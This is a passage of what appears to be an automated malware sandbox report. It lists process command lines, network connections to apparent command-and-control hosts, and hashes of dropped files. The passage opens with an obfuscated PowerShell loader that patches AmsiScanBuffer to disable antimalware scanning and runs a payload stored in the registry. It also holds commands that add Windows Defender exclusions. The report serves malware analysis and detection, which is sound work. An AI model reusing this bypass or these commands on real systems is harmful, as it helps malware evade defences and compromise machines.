@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Joex1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Joex1.exe'
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158}
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 172.67.75.40:80 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 104.16.185.241:80 | icanhazip.com | tcp |
| N/A | 127.0.0.1:49799 | tcp | |
| N/A | 127.0.0.1:49802 | tcp | |
| US | 172.67.75.40:443 | rentry.co | tcp |
| N/A | 127.0.0.1:49805 | tcp | |
| US | 162.159.137.232:443 | discord.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49810 | tcp | |
| N/A | 127.0.0.1:49816 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49821 | tcp | |
| N/A | 127.0.0.1:49824 | tcp | |
| N/A | 127.0.0.1:49828 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:49831 | tcp | |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FR | 162.19.58.159:443 | i.ibb.co | tcp |
| US | 147.185.221.18:41012 | tcp | |
| US | 147.185.221.19:2519 | seems-radio.gl.at.ply.gg | tcp |
| US | 147.185.221.16:13795 | adult-purchased.gl.at.ply.gg | tcp |
| US | 147.185.221.19:2519 | seems-radio.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41012 | tcp | |
| US | 147.185.221.16:13795 | adult-purchased.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41012 | tcp | |
| US | 147.185.221.16:13795 | adult-purchased.gl.at.ply.gg | tcp |
| US | 147.185.221.18:41012 | tcp | |
| US | 147.185.221.16:13795 | adult-purchased.gl.at.ply.gg | tcp |
| GB | 184.28.176.81:443 | tcp | |
| GB | 51.132.193.104:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| US | 147.185.221.18:41012 | tcp | |
| US | 147.185.221.16:13795 | adult-purchased.gl.at.ply.gg | tcp |
Files
memory/1940-0-0x00007FF962673000-0x00007FF962675000-memory.dmp
memory/1940-3-0x000002E2A0920000-0x000002E2A0942000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5nmxuch.h44.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1940-10-0x00007FF962670000-0x00007FF963132000-memory.dmp
memory/1940-11-0x00007FF962670000-0x00007FF963132000-memory.dmp
memory/1940-12-0x00007FF962670000-0x00007FF963132000-memory.dmp
memory/1940-13-0x000002E2A0F30000-0x000002E2A10F2000-memory.dmp
C:\Users\Public\uninstaller.bat
| MD5 | 5be8fed544d05f92d1f7ecd4015f461a |
| SHA1 | adaf0a846145d891b55d625bb75ae13928f4483c |
| SHA256 | a6e3b90aea7ade9e66ce05dd726737e116a0dea80bcd20ca96ec03e8dedcf699 |
| SHA512 | debb8e65a783dc289b02340c0efd11a10e331d9e728d8ba5ae8ec79267e9aeaab611a406def956660f0b3a1fbeb702e564a7ea271c4359734c157f2232c288c2 |
memory/1940-21-0x00007FF962670000-0x00007FF963132000-memory.dmp
C:\ProgramData\winlog32.bat
| MD5 | 230f2e8c6fa8eee3935356ca122db8ce |
| SHA1 | 0d25a7f01224d87b0a408f6e639432d44b20db65 |
| SHA256 | 4e9d91b0feca6307b850061006f202601154fb0c208306f389810fc8e601e660 |
| SHA512 | 773436cc55584a52243dd715a29d924dac8284bcba6602c7c5a2548c00213c230e27cc991cb6397fb5bda2ecb9f06ad3f5c6deb6f87f14d530138cce1c9e55c8 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 60efcaf245291c5fb8d700f099c371ea |
| SHA1 | f066c7e948db3cda233b4e2786aad20c7f106920 |
| SHA256 | c15fa04d510034cd6e9148ebb92a559e546843d5db98a27086504fab4f36d02e |
| SHA512 | 9b1b41ca283062e3ba80d358d5e0a9dfd2603cb66ced63b19349801cb0b260473d8b56a2fbc1f7bda8beceb3499f8ad7dfdef6090e87299e5c7497825749d513 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ef1064ce7b9afca99b64412656b1f8b |
| SHA1 | ada040d59728be3036296563f24dfc2644b82510 |
| SHA256 | a85a40d4c9e8e2ead9d7a14d8b0f8ddf07cc881e46da8444f7d13eb1872c9565 |
| SHA512 | 2bbac87ebabfd5d81c2ca7e25defc4a5a6019e9e5d86f9cb4662df6de257aac0d73da1b89408f69ad319909d12c47f7cf96d0581d860a627d96ec2674beac629 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb6332ae9e8fec69c2236355e2638f9d |
| SHA1 | 71500d57fb304979afd6756f06d4b9a59f995eb7 |
| SHA256 | 88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32 |
| SHA512 | e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fcbfea2bed3d0d2533fe957f0f83e35c |
| SHA1 | 70ca46e89e31d8918c482848cd566090aaffd910 |
| SHA256 | e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38 |
| SHA512 | d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 714bacb9b47ade6cac916935bf8e2fd8 |
| SHA1 | 250094faf06a099c7da5ffc5cc8304c84f1d3061 |
| SHA256 | 52b48a46211737488c95462fb118cf752b8863317776d40ce9e74b34d8444540 |
| SHA512 | 0f5de5cd70438002a816117af08d316ebeceef089db4ed25d9424ec9b6ee9cc652cfdf485f17811ad865ebd1a5df1e46a180437809d284b67defb5cd36cb0c4b |
C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
| MD5 | 1bb7940802b53faf639f5265e89a18b3 |
| SHA1 | 46411569489a5bf3844b19ea507b9fa85987551a |
| SHA256 | 9c0ef273a15f37bcfda6bd266d6bc7b76050447aa7d4d44a0f1a52f66f44f996 |
| SHA512 | 2a533a3b1da8eae721f995160796579b138394cf328630d5093203059f4a1e3318f04888edf7cc36a01db5303bc6537a38405b26408a83ce7eb926ab6c909575 |
C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
| MD5 | 082f413ea68e0f2d68fce0074c84c88c |
| SHA1 | 81c88c629961e3baad67c6b4b5113691c3d9cde5 |
| SHA256 | 84605e359c091438ed592a1b73c0efbc583f4e6a03c51f8d49861d5e00c91dd1 |
| SHA512 | 1da80720dd4c079cbafcae78f5497521245806e91424dd36b8a6c79c09813499100dbc7e5c290565d8fd50434f46e4acd9e23a6ad7d8deec29207c46829d3718 |
memory/4480-77-0x0000000000200000-0x000000000023C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 807e34150dfec5954368008d73b63da4 |
| SHA1 | 4c0be21e0b0c812901464cf5a6948a8c8f534b71 |
| SHA256 | d58cac2eb66f898fb372dd993c4e7a677eef19e67f2e73e4048cceee2e90fd1c |
| SHA512 | a481233a44a75b4122130925ff866feb7ac82719cccbc007e7475b9c32c46058120d9c1a550f53078fa0d5cbb9dcdf4d654c478a3a1b4286ccb73d3de761bf36 |
memory/4420-88-0x000001794AAF0000-0x000001794AC3F000-memory.dmp
C:\ProgramData\x4V5.2.exe
| MD5 | 1d68a875800780540a7a10e5243a26c1 |
| SHA1 | 62da3a00ce85933f766bb65b75baf44a1f16d059 |
| SHA256 | 0cf0eb06b862e6a7b5a28fb4e8d2f80d05a6520f63f8e0bb5922e85c6b41b2f2 |
| SHA512 | b3566f4f2a404912a000834fa6f09681e717d3a0f87aa416eb81c233a7a82d94f7b8f65ef734cd277778ebb118f4ccf385fb71cc5a54ec5aa09e932f79ec9842 |
memory/1540-100-0x0000000000660000-0x000000000067C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa7849d1120fa94ceeed026ce00ca2c5 |
| SHA1 | a111f0e297e591ca486bb85c94515be0932020eb |
| SHA256 | 6a22e9ad970c9e4b5184dc3e4ba14da991a08e7d130394c8396471e809762dc5 |
| SHA512 | c124286cafe66563cdd03b58091ff08bfeca9fb7688756564c9603b5c49c78fc98a933c0030caa722e475226e1bdff0fbff413a398889b7fc7cd332ad07b6fbc |
memory/408-111-0x000002266E250000-0x000002266E39F000-memory.dmp
C:\ProgramData\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
memory/2496-129-0x000001FA19BE0000-0x000001FA19C0A000-memory.dmp
memory/2496-131-0x00007FF982120000-0x00007FF9821DD000-memory.dmp
memory/2496-130-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp
memory/1100-134-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1100-135-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1100-133-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1100-138-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp
memory/1100-139-0x00007FF982120000-0x00007FF9821DD000-memory.dmp
memory/1100-137-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1100-132-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1100-140-0x0000000140000000-0x0000000140008000-memory.dmp
memory/640-145-0x000001C880290000-0x000001C8802BC000-memory.dmp
memory/640-152-0x00007FF943570000-0x00007FF943580000-memory.dmp
memory/696-163-0x00007FF943570000-0x00007FF943580000-memory.dmp
memory/996-174-0x00007FF943570000-0x00007FF943580000-memory.dmp
memory/472-185-0x00007FF943570000-0x00007FF943580000-memory.dmp
memory/540-189-0x0000020EF7690000-0x0000020EF76BC000-memory.dmp
memory/472-184-0x000001E282EB0000-0x000001E282EDC000-memory.dmp
memory/472-178-0x000001E282EB0000-0x000001E282EDC000-memory.dmp
memory/996-173-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp
memory/996-167-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp
memory/696-162-0x0000029426260000-0x000002942628C000-memory.dmp
memory/696-156-0x0000029426260000-0x000002942628C000-memory.dmp
memory/640-151-0x000001C880290000-0x000001C8802BC000-memory.dmp
memory/640-144-0x000001C880290000-0x000001C8802BC000-memory.dmp
memory/640-143-0x000001C880260000-0x000001C880286000-memory.dmp
C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe
| MD5 | 89e3cb825a0a2a7fa4888ea66802dc13 |
| SHA1 | 61025242fda034cd76f7c44860327465b303f69a |
| SHA256 | 47071488c86f41bcb9e15ee233484afe5dd801d40ecc989351254e704d6b2480 |
| SHA512 | f76c6e2fbc69bde418fd39d66f12ae84e61d30217a32b9f01dfdc8cbf14318a4a6435cdcdc35ca83b162dee99eb5a9667b1f4dff968e7d873d39abcf0703c843 |
memory/2480-872-0x0000000000390000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 856900844f6f1c326c89d0bcfb2f0c28 |
| SHA1 | 1caad440d46fa8c0cbed4822b4be2bbdddba97c2 |
| SHA256 | ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32 |
| SHA512 | ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b0a85f07903eaad4aace8865ff28679f |
| SHA1 | caa147464cf2e31bf9b482c3ba3c5c71951566d1 |
| SHA256 | c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5 |
| SHA512 | 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe
| MD5 | 10194be78216b8b290e3d8d02055957b |
| SHA1 | d5b42c116a56ca0fb507de577db183e5e740fe77 |
| SHA256 | 33ba879b2eec97789475dfea751a38002c0b89d7f61f610b6ead2fe18d6ee7e5 |
| SHA512 | 35b55168d8fb6632e176eaf8d74e9e8c50b27c0057e0c72098e81df55d6bd969a53c9138ef2b3486f5a32186d4294dd2e9c50d4f5842572dad698237fc9021ed |
memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe
| MD5 | 885df3eabb13cba468d3fe060b7561b0 |
| SHA1 | 9deeff0eabfc2f9ca0c8b2cd07a77565d0c5a376 |
| SHA256 | 8deb77e4f3cd316b63a1cefc208f9598533543639e143ea9867c4a93ebfe9de5 |
| SHA512 | 95f2b9e9a5e797508f28006163c737fb1b67c4ad7337fe65a6b63a3c7483f2014c66201f74bf1181d1add3414953eb4080be478b9fab7d8f4c30fb72d5fe540e |
memory/4672-1181-0x0000000000AA0000-0x0000000000B38000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8a7ab7bae6a69946da69507ee7ae7b0 |
| SHA1 | b367c72fa4948493819e1c32c32239aa6e78c252 |
| SHA256 | cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272 |
| SHA512 | 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683 |
memory/4672-1206-0x000000001CB10000-0x000000001CB4A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 190b28f40c0edd3cc08d0fd3aca4779a |
| SHA1 | 425b98532b6a18aa2baece47605f1cf6c8cfbd11 |
| SHA256 | 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce |
| SHA512 | 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 04493ed4421328d5e40252891bfe515a |
| SHA1 | ab8a4e3909ff849549ea989049ed30b490f274e7 |
| SHA256 | 3b14b48326a1201fc8b9667201c15392e52f7f5819c2aadafe19cbb72b08be51 |
| SHA512 | c8ca89143763a72f4ce8f10ffa2e161b59d41454bad0f71fcb4c7e9c8861a5d99bdc787907761bfb8439afad1f0557a1338bbb1054f5810de807633f515d5a76 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e46b66e9b3609911fdf14d0a418d978 |
| SHA1 | acd24b967cc801ecda3ae93dd0be6fd2a2ee5c9d |
| SHA256 | 81a642f2a14ab788978ed3a247432048cb6feb5be3cd40e276022562a4b7aa06 |
| SHA512 | 55b3f342fd0e097dd5028159d82d0b2c9f24669e334cc020c8c054e888157f2d67d6e618517900f4ee9a1f107c8ae6f9ae55d2f09833f6565964cfaa7fc0777e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a79484020d1fe82f2f791cc2582b5dec |
| SHA1 | 1c74da2b600fe1ac4ef9b41993b36fa6241c9e86 |
| SHA256 | 1c01ed1958207ff2e3a14430bd89b912a0ad28191817767764454ba0be1d4344 |
| SHA512 | e2a0bd264bc608c67eddfc333672b7cc201c35efd224bbc7f299a3fae6c3d18c8974fe8788dd90508a1f1b191ec53a0c8624c6285b011467ce71c4b82626fd04 |
memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp
memory/3672-1943-0x000000001C8F0000-0x000000001C8FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x4Malicious.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk
| MD5 | 7350b6b2078259137bddad4ac88b96f1 |
| SHA1 | d337d07890b665dd75068caa974847d451987225 |
| SHA256 | 1bd7ca6a81e76575f13076f3e80cdf95313a3ea0bf92c93babdf6d04e13cb606 |
| SHA512 | 795ac4f3fd22e89a068bd7e8cb140af6bfcd13738969ea997291b80b5f26177a59f5f5f907f95edcd2cbea0e2127a997f2c77e56ddf89921bf608f7d6114869c |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 8a86027e38ee15c51ee8865e6779ab0a |
| SHA1 | 19cdd9b88623ea87477cebe7a91b63d48b07b32c |
| SHA256 | 8210ee235cdf19788bc17d4ce419f1d79151b9aeaabf87a0ba7c6218acffc960 |
| SHA512 | 1ebf96a07b29fe9d70216fbbd5ba86dacca0e87b0416c2318e608068b224f80e03aae2c2f9f3302889d65f4623d25fe7d1ffa2c1324ae98ed60106c2fc9f46d2 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | cb76d822faa7e952296300763bed64cf |
| SHA1 | bd5477001d6f96ea7b640c2d0da9e0bc293bc090 |
| SHA256 | a4e304483c0ee4a73013c996f3bf98923ccef56381faed53f3ce72833ecf8ded |
| SHA512 | 12c835c94dd83ce7fee4439284f8d17d44a375e0de2d672370d7842f30c1efffd855be07a65756225e72405f4ed629936116b8b14e81d8147ab573bae64ebbf7 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 1e5ca1a3b67a5dfca2d4cdaa4b09778e |
| SHA1 | 532c39f79f0dc03756f49cf167eb4055d6e16f98 |
| SHA256 | 0f7cb79b5948a8aeefaae9432a1123baf8cedb5245d240d066652cb9019cebcf |
| SHA512 | 8327d747cdf5e0376310def9d4f7cb2679b471be4224944bd61effc4565e3db6a4e2a9dda4ae855d60110f672b1386f944b673e421b2e29f4a87d0c9133bc581 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 73f929ae27a3b93357b9eb4706764d5e |
| SHA1 | 492d30941e5dbb69c560001184a5131775ce35d9 |
| SHA256 | 7dec5e315a78b45e6cab16960c46d768482866a142a88bd6bad1c5a3e213d549 |
| SHA512 | bb82b73be2cd8d766a6e2eaf024770e7463d570d7207ca8b9868534757fd06b219c32627fc69a6413ee30ee23d7d76c41936a512b58a7e413de993083979a7e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | a88cbd0d52f4c6c36104206331ce657d |
| SHA1 | 4fbd087d18822c11f13a718c7ce26889f05c4060 |
| SHA256 | e1e9094acc4260860125efb556839783182cfb401aa059e590e91a1619b5b665 |
| SHA512 | 48d360777f4156c3aa8404f15f92e08c99f1c1ba304bd4368b0486ee8c915427d0f3836b958ea4eb64be4e9d4a57023def86b115ed6d74403e66845adab876cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | 1b1ea000d772f4e993de6834c17b755d |
| SHA1 | 913f449a9932c0bd42eb748487bf8cfd8134c4a9 |
| SHA256 | 6449d0a3f0356b243a5b5b6570036f0bc3471ec8c764d60c23ba155013beb7f4 |
| SHA512 | ab316d98bd21cd28612ecbd381202b9e65ccebca770ec9a59b0d79dafa9bdcf4a58941532035c3a48a604fdaf3bfcd4bff6b4981e7c56d67ce11b6c2d907b5a5 |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 26f17ae18099bfd0e81964751c8f5953 |
| SHA1 | 29f8f79c7d3ac8dfd402ae3a282141b7d4c07d32 |
| SHA256 | 730450b0d680be5cdb5de85546af077128cb24a42c6f419b86df8b072219dc7c |
| SHA512 | 879d1a2c8a1c32f0db84b840a72c257ecb7ec64435874b14d34073610227b0e078b27a8bb6f37e36e21442771daaf950ff9bd24e452eafdea5c196b607f872b2 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | 4c23ed218b1b803aa3772d963d486fc4 |
| SHA1 | 26c5a361572a4bbbc7e237d5d25feba2093c9f12 |
| SHA256 | d5aaa288fb1b7c3e00580f6fc5d580ba25d1a36721d479ea068625056ed85d05 |
| SHA512 | 97967f330577cd913eee1f6f687799b6a73d2b4ec39eebcabdb910d3b25aa8fa81bfa88d8bd84a78d0f005d1ab789f60fa346852b8bd134f622f27f094d7e3fc |
C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b0a40f6847934b610c24822c5c1e60b4 |
| SHA1 | 7a984562d0765a185ab4af0f6b574b326410e7eb |
| SHA256 | baa3c6350471601390dda37570a20a23567c582df132eb0fbe997f36ac831da2 |
| SHA512 | 05453981b9bd66438c4e707a2763e00f58929f41bc2802f01ba240f3d7d46a6f2a7be9c28192ba783ef42c33d0f1e50766a70edbd61e8c48f299e0da75712a8f |
C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
